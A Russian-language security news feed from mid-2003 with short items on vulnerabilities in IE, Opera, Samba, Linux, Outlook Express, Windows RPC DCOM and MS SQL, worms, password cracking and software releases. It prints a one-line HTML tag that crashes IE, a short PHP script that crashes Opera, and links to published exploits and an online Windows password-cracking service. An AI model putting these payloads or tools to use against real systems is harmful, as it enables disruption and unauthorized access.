22/08/2003 17:26 Он-лайн тестирование веб-страниц
По нижеприведенному адресу живет рекламная система проверки веб-страниц на доступность и безопасность. Ее рекламность заключается в том, что по окончании проверки вы увидите объявление о возможностях покупных систем этой конторы. Информация о странице после тестирования делится на разделы quality, accessibility и privacy (page encryption level, forms, forms using GET, controls и т.д.). Он-лайн тестирование веб-страниц: http://webxact.watchfire.com/
21/08/2003 22:34 Ура! Мы снова в сети.
Не смотря на все сложности, сайт снова поднят, за что огромное спасибо Void.Ru, а в особенности Кроку. Мы по прежнему розыскиваем Перл программера для разработки новой версии сайта и помощи по его поддержке. Писать с предложениями сюда: http://www.uinc.ru/comment.shtml
21/08/2003 18:02 Мониторинг атак на IIS 6 с помощью MRTG
Multi Router Traffic Grapher (MRTG) - это простая кросс-платформенная утилита, давно используемая системными администраторами для слежения за загрузкой сети. Ее основная идея проста: по результатам запросов к счетчикам SNMP периодически создаются HTML страницы, изображающие графики объема входящей и исходящей информации от времени. MRTG способна значительно на большее - отображение любой информации, содержащейся в счетчиках SNMP. Microsoft создала веб-сайт, демонстрирующий некоторые из SNMP счетчиков Windows 2003. MRTG также может выполнять обязанности системы обнаружения вторжений. Подробности: http://securityfocus.com/infocus/1721
21/08/2003 17:31 Пара статей для программистов
Две очень интересные статьи из последних номеров MSDN Magazine от Мэта Питрека и Дино Эспозито. Программисты must read, однозначно. Те, кого смущает язык оригинала, могут прочесть то же по-русски в переводе "Русской редакции", но за деньги. Ссылки на статьи в буржуйском MSDN mag: Внутреннее устройство Windows Server 2003 Удаленное управление буфером обмена
4/08/2003 23:59 Новая версия PE Tools v1.5.300.2003
Что нового в этой версии: - Исправлено несолько мелких багов (Tnx: cyberbob) - Исправлен очень большой баг в PE Sniffer-е. PE Sniffer не работал под WinXP + Код PE Sniffer-a полностью переписан + Добавлено несколько новых сигнатур (Tnx: .Cryorb & BiDark) + Добавлено три пункта к контекстное меню Section Editor-a: - Kill Section (from header) - Kill Section (from file) - Fill Section + Добавлена новая опция в Rebuild PE: - File Alignment + Теперь процессы можно убивать по нажатию клавиши Delete + Во все диалоги добавлена кнопка "X" :) Скачать последнюю версию: http://www.uinc.ru/scripts/load.cgi?files/neox/PE_Tools.zip
31/07/2003 10:23 Платный антиспамовский сайт рекламирует себя при помощи спама.
Включить свой e-mail в список электронных адресов, на которые не будет приходить спам, гражданам США можно за 9 долларов 95 центов в год. Однако сайт Remove.Org, предлагающий подобную услугу, рекламирует себя также через спам. По информации сайта MSNBC News, организатор этого предприятия Джонатан Энжелл (Jonathan Angell) берется за указанную сумму исключить адрес своего клиента из списков электронной почты, которыми пользуются тысячи спаммеров. Вместе с этим Remove.Org может остановить поток нежелательных звонков и факсов. Как объясняет сам Энжелл, рассылка писем с порнографическим содержанием прекращается направлением требования провайдеру спаммера. Это должно быть сделано именно в форме запроса потому что Remove.Org не является правоохранительным ведомством и не может применять какие-либо силовые меры. После небольшой проверки, проведенной журналистами MSNBC News, удалось выяснить, что Remove.Org не зарегистрирован в качестве некоммерческой организацией, как об этом заявлено на самом сайте. Руководитель компании пояснил, что процесс регистрации еще не завершен. Подробнее - http://msnbc.com/news/946003.asp
31/07/2003 01:23 Уязвимость в Novell eDirectory.
Novell выпущен бюллетень по безопасности TID2964936, в котором констатируется факт наличия уязвимости в eDirectory - программном пакете для обеспечения функционирования приложений с использованием сервиса директорий по протоколу LDAP (Lightweight Directory Access Protocol). Очень подробно, конечно же, Novell о природе уязвимости не распространяется, просто замечая, что существуют уязвимости: утечка памяти, возможность создания неизвестных объектов (?) и Abend on unattended repair. Уязвимости обнаружены в версии eDirectory 8.7.0 для платформ NetWare и NT. Выпущен соответствующий патчик. Также в бюллетене есть ссылка на патч для UNIX/Linux. Подробности - http://support.novell.com/cgi-bin/search/searchtid.cgi?/2965952.htm
31/07/2003 01:13 Уязвимость в SAMBA.
Господин flatline из Нидерландов опубликовал эксплоит, который позволяет удалённо свалить SAMBA-сервер. SAMBA - реализация в *NIX-системах SMB-протокола, позволяющего по NetBEUI расшарить директории и принтеры *NIX-сервера для машин Windows-сети. Уязвимость обнаружена в функции reply_nttrans SAMBA версии <= 2.2.7a. Используя уязвимость можно вызвать переполнение буфера в стеке и, как результат, свалить сервер или выполнить произвольный код в системе. Для предотвращения рекомендуется обновиться до версии 3.0.0beta3 или позже. Эксплоит - http://www.securiteam.com/exploits/5TP0M2AAKS.html
30/07/2003 17:33 Очередная уязвимость в IE.
James Wolfe из QuIC Solutions, Inc. сообщает об уязвимости популярного (и с точки зрения уязвимостей) бр[оа]узера Internet Explorer c SP1. На этот раз уязвимость присутствует в элементе управления ActiveX. Сформировав код вида: <OBJECT CLASSID="CLSID:1C82EAD9-508E-11D1-8DCF-00C04FB951F9" data="1.html"></OBJECT>, можно успешно погасить "Ослика". В этой уязвимости поражает удивительная способность M$ неоднократно наступать на грабли. Дело в том, что подобная уязвимость в ActiveX была обнаружена в марте 2000 г. в MS Outlook Express, которая позволяла, используя подобный код читать любые файлы на компьютере жертвы. Источник - http://www.securityfocus.com/archive/1/330881
30/07/2003 17:05 Уязвимость в ядрах Linux.
Jared Stanbrough cообщает об уязвимости в ядрах Linux версий до 2.4.21. Она присутствует в подпрограмме представления данных XDR вызова процедур сетевой файловой системы NFSv3, конкретно - в программе fs/nfsd/nfs3xdr.c дерева исходников ядра (подпрограмма decode_fh). При вызове функции выделения памяти memcpy один из аргументов "p" не проверяется при XDR-обработке. Таким образом, удалённый атакующий, сформировав негативное значение аргумента "p", удалённый атакующий может обойти проверку безопасности и (из-за особенностей функции memcpy) передать очень большое значение (определяется структурой fhsize) пространству памяти ядра, что, в свою очередь, может привести к "kernel panic". Автором выпущен эксплоит, способный вызвать удалённый DoS (по некоторым данным существует возможность выполнения произвольного кода в системе). Однако, для его функционирования необходимо, чтобы атакуемый сайт имел экспортированную директорию, доступную для атакующего, что далеко не всегда бывает. Однако сам автор пишет, что атака может быть осуществлена другими методами. Для предотвращения атаки рекомендуется изменить значение аргумента "p", назначив его тип unsigned int, либо включить в исходный код проверку на >0. Другим (более логичным вариантом) является переход на версию ядра 2.4.21. Подробности - http://www.securityfocus.com/archive/1/330888/2003-07-26/2003-08-01/0
30/07/2003 16:53 Вышел KDE 3.1.3.
Вышла новая версия KDE за номером 3.1.3. В этой версии в основном исправлены обнаруженные ранее ошибки (в том числе и ошибки аутентификации в Konqueror). Подробности - http://www.kde.org/announcements/announce-3.1.3.php
30/07/2003 15:41 Windows XP: Проверено – мин нет.
Разобрав по косточкам систему онлайн-активации Windows XP, немецкие программисты пришли к выводу, что на этот раз Microsoft не врет: система действительно не отсылает в Редмонд личной информации о пользователе. По данным немецкого канала tecChannel, на которые ссылается The Register, система онлайн-активации Windows XP (известная как WPA – Windows Product Activation) работает примерно следующим образом. Сначала передается идентификационный код данной версии операционной системы (Product ID), извлеченный из кода доступа, введенного во время установки системы. Затем WPA выковыривает из компьютера данные о географической принадлежности пользователя и языка, используемого по умолчанию. На третьем этапе программ-активатор отправляет в Редмонд код продукта, представляющий собой первые пять цифр кода доступа. Проверив «железо», поверх которого устанавливается Windows XP, WPA генерирует анонимный идентификатор для конкретной копии системы (здесь The Register достаточно невнятен, хотя и утверждает, что никаких данных о типе процессора, используемой видекарте и материнской плате, на которой это все повешено, сервер Microsoft не требует). И, наконец, в качестве последнего аккорда в Америку уезжает информация о предыдущих инсталляциях Windows, содержащаяся в файле WPA.DBL. Источник - http://www.securitylab.ru
30/07/2003 15:01 Руководство охранного сервера попросило не взламывать их сайт.
Проект Охрана.ру посвящен вопросам безопасности во всех ее ипостасях. На днях администрация интернет-газеты выступила с открытым письмом к хакерам с просьбой не взламывать сайт. В частности, в открытом письме главного редактора Охрана.ру Льва Митина говорится следующее: "За последнюю неделю замечены постоянные нарушения в работе сайта нашей интернет-газеты www.OXPAHA.ru . Вместо главной странички сайта стало появляться сообщение Still alive in our hearts - DVX NOBIS вместе с фотографией Муссолини. Я специально привожу полное содержание "червяка", может быть кто-нибудь узнает автора по почерку. Вместе с тем наблюдался сбой в работе с административными страничками сайта, то есть, опубликование любого сообщения в интернет-газете было невозможно. Редакция ежедневно получает письма от возмущенных читателей, предупреждающие о "муссолини". Их беспокоит данная ситуация, они требуют нормальной работы сайта. Коллектив редакции обеспокоен возможной потерей значительной части читательской аудитории, а также постоянных клиентов, сотрудничающих компаний и издательств. В связи с неоднократными техническими перебоями в работе сайта, посещаемость интернет-газеты как специализированного издания по безопасности снижается, а может это и было конечной целью провокаторов? Мы с провайдером решили эту проблему, но будет всем лучше, если "активные специалисты" - вредители будут иметь совесть, и не станут засорять нужные и полезные интернет-издания". Позиция редакции вполне понятна. Вот только солидно ли взывать к совести хакеров изданию, посвященному безопасности? В данной ситуации как нельзя лучше подходит народная мудрость о том, что спасение утопающих - дело рук самих утопающих (www.runet.ru). Обращение и дискуссия - http://www.oxpaha.ru/view.asp?9600
30/07/2003 15:48 Компиляторы Intel для беспроводных устройств.
Корпорация Intel анонсировала свои первые компиляторы, которые помогут разработчикам создавать приложения для карманных ПК на базе архитектуры Personal Internet Client Architecture, сотовых телефонов и других беспроводных устройств, где используются процессоры на базе технологии XScale. Новый компилятор Intel C++ для Microsoft eMbedded Visual C++ является частью пакета компиляторов корпорации, в который входят также инструментальные средства разработки ПО с оптимизацией для процессоров Pentium 4, Xeon и Itanium 2. Это позволит разработчикам использовать единый набор инструментальных средств для создания приложений под офисные, домашние и мобильные вычислительные устройства на базе процессоров Intel. Наряду с большинством возможностей, уже присутствовавших в версии 7.1 компиляторов Intel C++ для Microsoft Windows, в новых компиляторах реализована полная поддержка процессоров PXA25x, PXA26x и других процессоров на базе технологии XScale, а также поддержка технологий Wireless MMX, совместимость с инструментариями Platform Builder для Windows CE .NET и Embedded Visual C++, межпроцедурная оптимизация, библиотеки эмуляции операций с плавающей точкой, поддержка встраиваемых функций, используемых исключительно Microsoft, и расширения для отладки в версии для производителей систем, упрощающие процесс разработки. Подробнее - http://www.osp.ru/news/soft/2003/07/30_01.htm
30/07/2003 15:26 Прекращение поддержки Windows 98 приведет к росту продаж ПК.
Исследовательская компания iSuppli опубликовала результаты исследования, предсказывающего значительный рост продаж персональных компьютеров во второй половине текущего года. И хотя на рынке только-только наметилась стабилизация после долговременного спада, и многие эксперты с осторожностью оценивают перспективы рынка в нынешнем году, в iSuppli полны оптимизма. По мнению аналитиков компании, у роста продаж компьютеров в нынешнем году будет мощный стимул. В 2004 году корпорация Microsoft прекратит поддержку операционной системы Windows 98, и многим компаниям волей-неволей придется переходить на более современные ОС - Windows 2000 или XP. Этот переход и станет основным катализатором роста продаж компьютерной техники. В последние годы корпорации достаточно неохотно занимались модернизацией компьютерного парка. Это позволило на некоторый период сократить расходы. Однако теперь эксплуатация техники четырех-пятилетней давности становится невыгодной. Во-первых, физический износ комплектующих приводит ко все более частым сбоям, а во-вторых, на старых компьютерах Windows 2000 и XP работают слишком медленно. Все это заставит компании раскошелиться на новые ПК для своих сотрудников. Источник - http://www.compulenta.ru
30/07/2003 14:44 В Kazaa завёлся червь Lorsis.
Компания Symantec предупреждает о появлении нового деструктивного червя W32.Lorsis.Worm. Он распространяется через файлобменную сеть Kazaa, маскируясь под утилиты для взлома популярных программ или порноклипы. Файл с вирусом имеет фальшивое расширение (.zip, .avi, .jpg или .doc), после которого идут несколько пробелов и настоящее расширение - .exe. После запуска червь копирует себя в общие для пользователей Kazaa папки, стирает редактор реестра и утилиту MSConfig.exe, обеспечивает свой автозапуск. Если системная дата находится в интервале с 6 по 31 декабря, червь создает и запускает командный файл, в котором содержатся команды на удаление системных файлов в папках C:\Windows, C:\Windows\System и C:\Windows\System32. Источник - http://www.symantec.com
30/07/2003 14:18 Минпечати объявило войну пиратам.
По данным Министерства РФ по делам печати, телерадиовещания и средств массовых коммуникаций, в 2002 году в России было реализовано 442 млн. единиц аудио- и видеопродукции. При этом только 85 млн. произведены легально. Общий объем продаж видеокассет в России в 2002 году составил 103 млн. копий, лицензионных из них было 17,5 млн. - это всего 17% от оборота продаж на рынке. Такие данные были озвучены в ходе коллегии МПТР, прошедшей 29 июля. На коллегии был рассмотрен вопрос о лицензировании деятельности по изготовлению экземпляров аудиовизуальных произведений и фонограмм на любых видах носителей. Участники совещания отметили, что важным механизмом защиты авторских и смежных в России является лицензирование деятельности по изготовлению экземпляров аудиовизуальных произведений и фонограмм. Минпечати ссылается на исследования, которые показывают, что 80% реализуемых DVD-дисков (1,75 млн. копий) – нелицензионная продукция. Объем реализации аудиокассет в 2002 году составил 230 млн. копий и 76% из них - пиратские. Кроме того, в прошлом году было реализовано 87 млн. компакт-дисков, доля нелицензионных копий составляет 86%. Общий же оборот аудио/видеорынка в России в 2002 году составил 940 млн. долларов, из них 72% - оборот нелегального рынка . Согласно закону «О лицензировании отдельных видов деятельности», на основе которого было разработано Положение о лицензировании деятельности предприятий, тиражирующих аудио/видеопродукцию, производители обязаны иметь документальное подтверждение наличия у них авторских и смежных прав на изготовление экземпляров аудио/видеопродукции, а также вести подробный учет всей выпущенной продукции. Источник - http://www.cnews.ru
30/07/2003 13:13 Итоги тестирования антивирусных продуктов Virus Bulletin.
Британский журнал Virus Bulletin, одно из наиболее авторитетных международных изданий в области компьютерной вирусологии, в своем августовском номере за 2003 год традиционно опубликовал результаты тестирования наиболее востребованных антивирусных программ рынка Англии. Тестированию в рамках данного выпуска журнала подверглись решения, предназначенные для защиты серверов под управлением операционной системы Novell Netware. В тестировании принимали участие: Symantec AntiVirus, Norman FireBreak, NAI McAfee NetShield, Sophos Anti-Virus, VirusBuster VBShield, Eset NOD32, Dr.Web, Command AntiVirus, CA Vet NetWare AntiVirus и CA Inoculate IT, Антивирус Касперского. По итогам тестирования Антивирус Касперского® для Novell Netware показал отличные результаты по всем рассматриваемым в исследовании критериям, войдя в число самых надежных, производительных и удобных для пользователя средств защиты от вредоносных программ. Результатом победы разработки "Лаборатории Касперского" стало получение очередной награды "VB100%". Источник - www.kaspersky.ru
29/07/2003 15:33 Уязвимость в Opera.
Обнаружена уязвимость в довольно популярном и не менее быстром броузере Opera, выпускаемом норвежской компанией Opera Software. Для проведения уязвимости достаточно на странице сформировать скрипт, который бы в качестве идентификатора протокола формата URL (Ex.: http:, ftp: etc.) вызывал бы достаточно длинную строку. При этом из-за ошибки в разборе заголовка протокола происходит отказ броузера и он благополучно падает. Автор (некий dodo) в качестве примера приводит скрипт на PHP вида: <?php for($i=0; 20000+10000>$i; $i++) $prot.="A"; header("Location: $prot://dd"); ?> Уязвимость обнаружена в версиях 6.12-7.0. Подробности - http://www.securiteam.com/securitynews/5WP0P2AAKE.html
29/07/2003 15:09 Выпускник МГУ победил программистов НАСА.
Не так давно весь мир снова стал свидетелем удивительной победы в международном турнире по программированию. Василий Громов, выпускник МГУ, со своей программой одержал победу над разработкой специалиста из самого НАСА. Престижный международный турнир под названием «Сетевые войны» (GridWars) проводился в этом году в Сан-Хосе. Цель соревнования ї на заданном организаторами языке программирования написать такое приложение, которое сможет справится с поставленной задачей быстрее других. В финал конкурса, судейство которого проводилось по олимпийской системе, были отобраны две программы - разработка профессионала из НАСА Майкла Уэнига и «Кобра» 23-летнего Василия Громова из Ступино. В результате долгого и упорного соперничества, программа россиянина, все-таки взяла верх. Подробнее - http://news.bbc.co.uk/hi/russian/sci/tech/newsid_3105000/3105747.stm
29/07/2003 14:36 Вышел первый релиз Mozilla Thunderbird.
Как сообщается на linux.org.ru, вышел первый релиз проекта Thunderbird за номером 0.1. Thunderbird - это _отдельный_ клиент почты и новостей на базе Mozilla. Как известно из предыдущих новостей, в соответствии с Roadmap упор будет сделан как раз на проекты Firebird (браузер) и Thunderbird (клиент почты и новостей). Радует скорость работы над проектом. Конечно, этот релиз ещё нестабилен - но сносно работает. Подробности - http://www.mozilla.org/projects/thunderbird/release-notes.html
29/07/2003 14:27 Уязвимость в Microsoft Outlook Express.
Повторение ранее устраненной уязвимости обнаружено в Microsoft Outlook Express. Удаленный пользователь может послать код сценария в plain text сообщении, который будет выполнен клиентом целевого пользователя. Удаленный пользователь может внедрить HTML с кодом сценария в plain text e-mail сообщение и послать сообщение Microsoft Outlook Express (OE) пользователю, чтобы OE обработал и выполнил код сценария (если выполнение сценариев разрешено на OE клиенте целевого пользователя), даже если сообщение послано в plain text формате. Подобная уязвимость была обнаружена в сентябре 2001 года (Alert ID 1002413; CVE CAN-2001-0999) и бы по сообщением была устранена через некоторое время. Уязвимости подвержены Microsoft Outlook Express 5.5-6.0. Подробнее - http://www.securitylab.ru/?ID=39234
29/07/2003 13:24 Лидеры ИТ-индустрии принимают новые меры по обеспечению серверной безопасности.
Крупные компании, производители компьютерного оборудования и разработчики средств информационной безопасности, объединили усилия в области создания новых стандартов защищённых вычислений. В сформированный альянс вошли Hewlett-Packard, IBM и Sun Microsystems, а также Tripwire, RSA Security и InstallShield Software. Цели и задачи нового альянса будут обнародованы 5 августа, сейчас известно только, что в основе разрабатывающихся технологий будет лежать принцип отслеживания изменений ПО на серверах. Об этом сообщил аналитик Gartner Джон Пескаторе, добавив, что базироваться новые технологии будут на решениях от Tripwire. Орегонская компания Tripwire разрабатывает технологию создания образов установленного ПО для отслеживания случаев его модификации. В прошлом Sun вкладывала средства в развитие Tripwire и можно ожидать, что средства мониторинга ПО будут интегрированы в ОС Solaris. Об аналогичных планах HP и IBM пока неизвестно. На долю RSA придётся обеспечение цифровых сигнатур программного обеспечения, которые будут храниться в базе данных производства Tripwire. InstallShield, в свою очередь, поставит средства распространения ПО. Выбор подхода, предусматривающего контроль аутентичности ПО, обусловлен тем, что 80% сетевых нападений основаны на подмене хакерами программных модулей на атакуемых серверах. Источник - http://www.compulenta.ru
29/07/2003 11:00 Cканер уязвимости Windows RPC DCOM.
После появления нескольких эксплоитов уязвимости в компоненте RPC DCOM (Distributed Component Object Model), недавно обнаруженной польской группой LSD (Last Stage of Delirium) и успешно (?) залатанной M$ патчиком, ссылка на который приведена в бюллетене MS03-026, компания eEye Digital Security решила выпустить бесплатный сканер для поиска уязвимых серверов. Как пишет сама компания, появление подобного сканера было вызвано большим риском для функционирования серверов после выпуска эксплоита китайской командой XFocus. Для получения сканера необходимо проойти этап регистрации на сервере eEye, после чего по указанному адресу присылается ссылка, с которой можно скачать сканер. Кроме того, компания указывает, что процедура включенния проверки уязвимости RPC DCOM включена в выпускаемый компанией сканер уязвимостей Retina. На всякий случай привожу прямую ссылку на сканер (если кому-то лениво самому регистрироваться ;)). Сканер с регистрацией - http://www.eeye.com/html/Research/Tools/Download.asp?file=RetinaRPCDCOM Прямая ссылка - http://www.eeye.com/html/Research/Tools/Download.asp?file=RetinaRPCDCOM&id=030729.020104.703304
29/07/2003 10:44 Хакеры хотели навредить имиджу Content.ru.
Сервис почтовых рассылок Mail.ru на прошлой неделе подвергся атаке злоумышленников. Администрация портала предупредила пользователей о том, что высылать пароли не нужно. Злоумышленники решили традиционным путем выведать пароли подписчиков сервиса Content.ru. Пользователям было разослано письмо якобы от администрации сервиса с просьбой подтвердить в ответе свои регистрационные данные. Такая просьба объяснялась тем, что в работе сервера почтовых рассылок случился сбой. Как отметила вице-президент Mail.ru Татьяна Желонкина, это обычный прием для злоумышленников. "Мы были вынуждены предупредить пользователей что сбоя не было и пароли мы не просили высылать", - резюмировала она Источник - http://www.runet.ru
28/07/2003 19:59 Эксплоиты Windows RPC DCOM.
Сразу из нескольких источников сообщили о написании эксплоита для Windows RPC DCOM Buffer Overflow Remote. Уязвимость позволяет удаленному пользователю получить полный контроль над уязвимой системой через DCOM в Windows 2000/XP. Эксплоиты - http://www.securitylab.ru/?ID=39189
28/07/2003 19:38 Выход Linux 2.6.0-test2.
Линус Торвальдс выпустил очередную, вторую бета-версию нового ядра Linux - 2.6.0. В основном в новой версии - различные мелкие обновление и замеченные багофиксы. Подробности - http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.0-test2
28/07/2003 18:27 Эксплоит уязвимости MS SQL-сервера.
Китайская группа XFocus Опубликовала эксплоит уязвимости, обнаруженной ранее в компоненте именованных каналов (named pipes) популёрной СУБД MS SQL (версии 7.0, 2000). Написан на С++. Для успешного запуска откомпилированного эксплоита необходимо подбирать размер буфера, который зависит от поставленного сервис-пака. Напомним, что патч от M$ выпущен и ссылка на него содержится в бюллетене MS03-31. Эксплоит - http://www.xfocus.org/exploits/200307/expMS0331.cpp
28/07/2003 18:13 Novell выпустила ОС NetWare 6.5.
Novell объявила дату выхода окончательного варианта своей сетевой операционной системы NetWare 6.5. Продажи новой ОС по всему миру начнутся 15 августа. Новая ОС может управлять сетями практически с любыми клиентcкими компьютерами и системами хранения данных. Стоит отметить, что NetWare 6.5 является системой, промежуточной между прошлыми версиями NetWare и NetWare 7, которая будет основана на ядре Linux. Пока же ядро системы остается традиционным, однако в состав новой версии Netware включен обширный набор пакетов с открытым исходным кодом. Это Apache, MySQL, Perl, PHP и некоторые другие. В Novell отмечают, что в результате, пользователи NetWare получат возможность применять все лучшие разработки open source на надежной, безопасной и масштабируемой платформе. В состав Netware 6.5 входит сервер приложений Novell exteNd Application Server, позволяющий использовать все преимущества платформы J2EE и веб-сервисов на ее основе. С помощью пакета Novell Nterprise Linux Services можно переносить многие сетевые службы NetWare на серверы, работающие под Linux. Важной частью Netware 6.5 является служба Virtual Office ("виртуальный офис"), c помощью которой можно обеспечить доступ удаленных сотрудников ко всем необходимым корпоративным ресурсам, включая файлы, планировщики рабочего времени, принтеры, системы электронной почты и т.д. Источник - http://www.compulenta.ru
28/07/2003 17:08 Oracle сообщила о 3 уязвимостях в своем ПО.
Производитель баз данных - компания Oracle сообщила о трех уязвимостях, найденных в её ПО, и повторно напомнила о четвертой уязвимости, связанной с сервером приложений Oracle. Две наиболее серьезные “дыры” находятся в наборе серверных приложений E-Business Suite, они получили наивысшую степень серьезности угрозы безопасности. Первая из уязвимостей связана с Java server pages и компонентом AOL/J Setup Test Suite, позволяя любому пользователю просматривать конфигурацию продукта и системную информацию. Вторая ошибка связана с переполнением буфера в компоненте FNDWRR и может приводить к аварийному отказу приложения и потенциально позволяет атакующему запускать собственный код. Еще одна “дыра” находится в серверном программном обеспечении и может привести к запуску опасного выполняемого кода, но только пользователем, имеющим администраторские права доступа к системе. Кроме того, компания повторила предупреждение по нескольким уязвимостям в сервере приложений, которые позволяют людям читать файлы или просматривать исходные коды JSP. Источник - http://www.cnews.ru
28/07/2003 15:55 Брешь на сайте Webnames.ru оперативно устранена.
В пятницу на нескольких сайтах появилось сообщение о наличии бреши в защите сервера www.webnames.ru. С подачи интернет-общественности дыра была оперативно залатана. Брешь позволяла смотреть счета разных пользователей. Это, в свою очередь, давало возможность проследить за темь, кто и какие домены собирается регистрировать. Вот как прокомментировал данное сообщение руководитель проекта Webnames.ru Сергей Шариков: "Webnames.ru - это плод тесного взаимодействия авторов с пользователями и мы всегда приветствуем замечания, направленные на улучшение технологии нашего сервиса. Действительно, была небольшая брешь на Webnames.ru. Разумеется, она была устранена в течение нескольких часов после появления данной публикации. Большое спасибо ее автору. Отраден сам факт появления подобной статьи в читаемых изданиях Рунета, подтверждающий интерес к нашему проекту". Источник - http://www.runet.ru
28/07/2003 15:21 Российский хакер приговорен к четырем годам американской тюрьмы.
Один из самых известных российских хакеров - Алексей Иванов - дождался таки решения суда по собственному делу. Через год он сможет выйти на свободу, поскольку уже провел три года в тюрьме, находясь под следствием. Иванов был приговорен в США к четырем годам тюрьмы и трехлетнему нахождению под наблюдением. Его сообщник Василий Горшков получил трехлетний срок еще в августе прошлого года, сообщает Газета.ру. Приговор был вынесен в четверг судом города Сакраменто, штат Калифорния. По словам судьи, ущерб от деятельности Иванова составил $25 млн. Jбвинения в компьютерном взломе были предъявлены россиянам в августе 2001 года в Калифорнии. Столь длительное течение судебного процесса объясняется большим количеством взломов, в которых был замешан Иванов. Еще одним камнем преткновения на пути быстрого решения вопроса стала законность (вернее, ее отсутствие) в действиях ФБР при раскрытии дела. Источник - http://www.gazeta.ru/
28/07/2003 14:57 Китайские хакеры эксплуатируют новую брешь в Windows.
Группа китайских программистов выпустила хакерскую программу, позволяющую получать контроль над удаленным компьютером через изъян в операционных системах Windows, сообщает Associated Press. Программа появилась на свет спустя девять дней после того, как Microsoft объявила об обнаружении бреши во всех ОС Windows, в том числе и в заявленной в качестве самой безопасной Windows Server 2003. Руководство Microsoft призвало пользователей максимально быстро скачать заплатку для обнаруженного изъяна. Однако многие, вероятно, так и не сделали этого. Изъян, используемый китайскими хакерами, был обнаружен польскими специалистами и получил название "Последняя стадия сумасшествия группы исследователей" (Last Stage of Delirium Research Group). Изъян связан с технологией сетевого доступа к файлам. С его помощью хакеры могут получать контроль над компьютером жертвы, воровать с него данные, удалять файлы и читать электронную почту. Китайская организация Xfocus, разместившая хакерскую программу на своем сайте, не посылала Microsoft никаких предварительных уведомлений. Впрочем, в Microsoft утверждают, что пока ничего не знают о случаях использования китайской программы. Подробности - http://story.news.yahoo.com/news?tmpl=story&cid=562&ncid=738&e=6&u=/ap/20030726/ap_on_hi_te/microsoft_flaw
28/07/2003 13:51 Недельный отчёт о вирусах Panda Software.
Компания Panda Software опубликовала традиционный еженедельный отчёт о вирусной активности прошедшей недели. Рассматриваются три червя: Gruel.E, Gruel.F и Cuydoc. «E» и «F» варианты червя Gruel распространяются по электронной почте и в программе обмена файлами KaZaA. Оба червя имеют следующие характеристики: 1. Чрезвычайно опасны, поскольку удаляют файлы, необходимые для нормальной работы Windows (AUTOEXEC.BAT, CONFIG.SYS и др.). 2. Вредоносные действия: открывают несколько окон Панели управления; открывают и закрывают лоток устройства для чтения компакт-дисков; отключают Панель задач; скрывают содержимое диска C: таким образом, что поиск файлов становится невозможным и др. - После заражения компьютера черви выводят на экран монитора ложные сообщения об ошибках Windows. - Создают записи в реестре Windows с различными ключами (в зависимости от того, был ли перезагружен компьютер или нет). Таким образом, Gruel.E и Gruel.F обеспечивают себе запуск при каждой загрузке файлов с расширением EXE, COM, BAT, PIF или файлов программы HyperTerminal. Основное отличие между ними заключается в том, что они распространяются в файлах-вложениях с различными именами. К письму, зараженному червем Gruel.E, прикреплен файл OFFICEXPTRIAL.EXE, у Gruel.F этот файл называется PROTECT_REMOVE_TOOL.EXE. Третий червь, Cuydoc, помимо обычных способов распространения, может передаваться на дискетах. Он автоматически копирует себя на дискету под именем CUPIDO.EXE. Последствия заражения червем Cuydoc весьма разрушительны, поскольку он удаляет все документы Word (файлы с расширением DOC) из папки Мои документы на компьютере жертвы. Кроме того, в испанских версиях Windows Me/98/95 Cuydoc не дает пользователю запустить программу REGEDIT.EXE (позволяет редактировать записи в Реестре Windows) и MSCONFIG.EXE (позволяет выбрать программы для загрузки с операционной системой). Источник - http://www.viruslab.ru
27/07/2003 02:14 Вышла русская версия четвертого сервис-пака для Windows 2000
Вышла долгожданная русская версия SP4 для Windows 2000. Она доступна для закачки со следующей страницы. http://www.microsoft.com/downloads/details.aspx?displaylang=ru...
27/07/2003 01:09 Шифрование директорий в *nix-системах с помощью openSSL
Денис Каледин опубликовал на Opennet.ru статью, в которой написаны скрипты для шифрования содержимого директорий с помощью openssl. Думаю, посетителей нашего сайта статья заинтересует. http://www.opennet.ru/base/sec/crypt_openssl.txt.html
27/07/2003 01:02 Пароли Windows можно сломать за считанные секунды
Швейцарский исследователь Филипп Ёкслин опубликовал в работу, в которой описывается новая методика расшифровки паролей. Она основана на известном свойстве алгоритмов расшифровки - увеличении объема сравнительных таблиц, в которых зашифрованным строкам ставятся в соответствие незашифрованные, что пропорционально снижает время, необходимое на расшифровку. Он исследовал и создавал алгоритмы, реализующие эффективную подмену затрачиваемого времени дополнительной памятью. Что касается паролей Windows, то они являются всего-навсего удачной иллюстрацией предложенного им метода. Ни один из хэширующих алгоритмов Windows (а их два - LANMan и NTHash) не добавляет к зашифрованному паролю случайной информации. В результате, один и тот же пароль на разных компьютерах шифруется в одну и ту же последовательность байтов. Поэтому, располагая достаточно большой сравнительной таблицей, такой пароль совсем нетрудно вскрыть. Подробнее http://www.compulenta.ru/2003/7/24/40961/?ref=sidebar. Автор реализовал идею, каждый может воспользоваться сайтом http://lasecpc13.epfl.ch/ntcrack/ для взлома-online.
24/07/2003 11:44 Выпущена альфа-версия Mozilla 1.5.
Проект Mozilla.org на днях выпустил очередную версию браузера - 1.5 альфа. Новый релиз представлен для операционных систем Windows (11,6 Мб), Mac OS X(14,9 Мб) и Linux (14,1 Мб). Разработчики усовершенствовали функции предыдущих версий. Подробности - http://www.mozilla.org/releases/#1.5a
24/07/2003 07:16 И ещё 3 бюллетеня по безопасности от Microsoft!
Похоже, июль побьёт все рекорды по бюллетеням безопасности от Microsoft, впрочем, не берёмся делать прогнозы на оставшиеся до декабря месяцы. Выпущены очередные 3 бюллетеня от M$ - MS03-029, 030, 031. В первом из них описывается наличие уязвимости в ОС Windows NT Server 4.0/ Terminal Server 4.0 в функции управления файлами. Наличие её позволяет вызвать переполнение буфера при разборе входных данных. При этом приложение, использующее область памяти, которая некорректно освобождается при вызове этой функции, благополучно падает и перестаёт обслуживать запросы. В бюллетене MS03-029 описано как пропатчить систему. Второй бюллетень (MS03-30) связан с уязвимостью в популярном API DirectX (затронуты версии от 5.2 до 9.0а, а также приложение Media Player 6.4). Cуть уязвимости связана с некорректной проверкой параметров MIDI-файлов низкоуровневым API из состава DirectX под названием DirectShow, при помощи которого приложения Windows осуществляют на стороне клиента обработку аудио и видео-данных. Создав специальный MIDI-файл и внедрив его либо в Web-страницу, либо в HTML-почту, удалённый злоумышленник может выполнить произвольный код в контексте безопасности пользователя, запустившего оный файл. И наконец, третий бюллетень - MS03-031 связан с уязвимостями в Microsoft SQL-сервере. Обнаружены 3 уязвимости в компонентах: Data Engine 1.0, Data Engine 2000, SQL Server 2000, SQL 